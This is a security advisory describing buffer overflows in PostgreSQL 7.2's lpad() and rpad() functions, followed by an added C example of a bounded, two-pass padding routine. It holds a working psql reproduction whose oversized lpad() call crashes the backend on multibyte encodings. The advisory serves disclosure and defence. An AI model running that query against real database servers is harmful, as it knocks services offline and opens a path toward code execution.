PostgreSQL is "an advanced object-relational database management system that supports an extended subset of the SQL standard, including transactions, foreign keys, subqueries, triggers, user-defined types and functions".
A vulnerability in PostgreSQL's lpad() and rpad() functions allows an attacker to cause the program to execute arbitrary code by overflowing an internal buffer.
Credit:
The information has been provided by Sir Mordred The Traitor.
Vulnerable systems:
* PostgreSQL version 7.2.0 and prior
There are two buffer overflows in src/backend/utils/adt/oracle_compat.c.
1) lpad(text, integer, text) function
2) rpad(text, integer, text) function
How to reproduce:
shell> pgsql template1 postgres
template1=# select version();
version
-----------------------------------------------------------
PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)
template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1=# \c my_db
You are now connected to database my_db.
my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!#
The same applies to the rpad() function.
The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE, MULE_INTERNAL.
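The reproduction above pairs a very large length argument with a multibyte encoding. The defensive pattern that closes this class of bug is to bound the requested length before it ever feeds an allocation size, and to size the buffer from a measured byte count rather than from `length * width` arithmetic that can wrap. The following is an added illustration written for this page; it is not PostgreSQL's oracle_compat.c and does not reproduce its internals. It assumes UTF-8 input and a constructed cap MAX_PAD_BYTES; lpad_safe, utf8_char_len and utf8_char_count are hypothetical names.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example code, not PostgreSQL's implementation. It assumes valid
 * UTF-8 input and an arbitrary, constructed limit on the padded result. */

#define MAX_PAD_BYTES (64 * 1024)   /* assumed cap on the result size */
#define MAX_CHAR_BYTES 4            /* longest UTF-8 sequence */

/* Byte length of the UTF-8 character starting at *p (assumes valid UTF-8). */
static size_t utf8_char_len(const unsigned char *p) {
    if (*p < 0x80) return 1;
    if ((*p & 0xE0) == 0xC0) return 2;
    if ((*p & 0xF0) == 0xE0) return 3;
    return 4;
}

/* Number of characters (not bytes) in a UTF-8 string. */
static size_t utf8_char_count(const char *s) {
    size_t n = 0;
    const unsigned char *p = (const unsigned char *)s;
    while (*p) { p += utf8_char_len(p); n++; }
    return n;
}

/* lpad_safe: left-pad `s` with `fill` to a total of `len` characters.
 * Returns a malloc'd string, or NULL when the request is rejected. */
char *lpad_safe(const char *s, long len, const char *fill) {
    /* Reject nonsense before any arithmetic touches an allocation size. */
    if (len < 0 || fill[0] == '\0') return NULL;
    /* `len` characters of up to MAX_CHAR_BYTES each must fit under the cap;
     * dividing the cap instead of multiplying `len` cannot overflow. */
    if ((unsigned long)len > MAX_PAD_BYTES / MAX_CHAR_BYTES) return NULL;

    size_t s_chars = utf8_char_count(s);
    size_t s_bytes = strlen(s);
    const unsigned char *f = (const unsigned char *)fill;
    size_t fill_bytes = strlen(fill);

    /* Requested length is not longer than s: truncate to `len` characters. */
    if ((size_t)len <= s_chars) {
        const unsigned char *p = (const unsigned char *)s;
        for (size_t i = 0; i < (size_t)len; i++) p += utf8_char_len(p);
        size_t nbytes = (size_t)(p - (const unsigned char *)s);
        char *out = malloc(nbytes + 1);
        if (!out) return NULL;
        memcpy(out, s, nbytes);
        out[nbytes] = '\0';
        return out;
    }

    /* Pass 1 measures exactly how many bytes the pad needs, cycling through
     * `fill`, so the allocation comes from a counted value. */
    size_t pad_chars = (size_t)len - s_chars;
    size_t pad_bytes = 0, fi = 0;
    for (size_t i = 0; i < pad_chars; i++) {
        if (fi >= fill_bytes) fi = 0;
        size_t cl = utf8_char_len(f + fi);
        pad_bytes += cl;
        fi += cl;
    }
    char *out = malloc(pad_bytes + s_bytes + 1);
    if (!out) return NULL;

    /* Pass 2 writes the pad with the same cycle, then the original string. */
    size_t o = 0;
    fi = 0;
    for (size_t i = 0; i < pad_chars; i++) {
        if (fi >= fill_bytes) fi = 0;
        size_t cl = utf8_char_len(f + fi);
        memcpy(out + o, f + fi, cl);
        o += cl;
        fi += cl;
    }
    memcpy(out + o, s, s_bytes);
    out[o + s_bytes] = '\0';
    return out;
}

int main(void) {
    /* The length from the advisory's reproduction is refused up front. */
    char *r = lpad_safe("xxxxx", 1431655765L, "yyyyyyyyyyyyyyyy");
    printf("huge length rejected: %s\n", r == NULL ? "yes" : "no");
    char *ok = lpad_safe("hi", 5, "xy");
    printf("lpad('hi',5,'xy') = %s\n", ok);
    free(ok);
    return 0;
}
```

The two-pass layout is the point: the only quantity that ever reaches malloc is a byte count produced by walking the actual fill characters, and the up-front bound is expressed as a division of the cap, so no multiplication by a character width happens on attacker-controlled input.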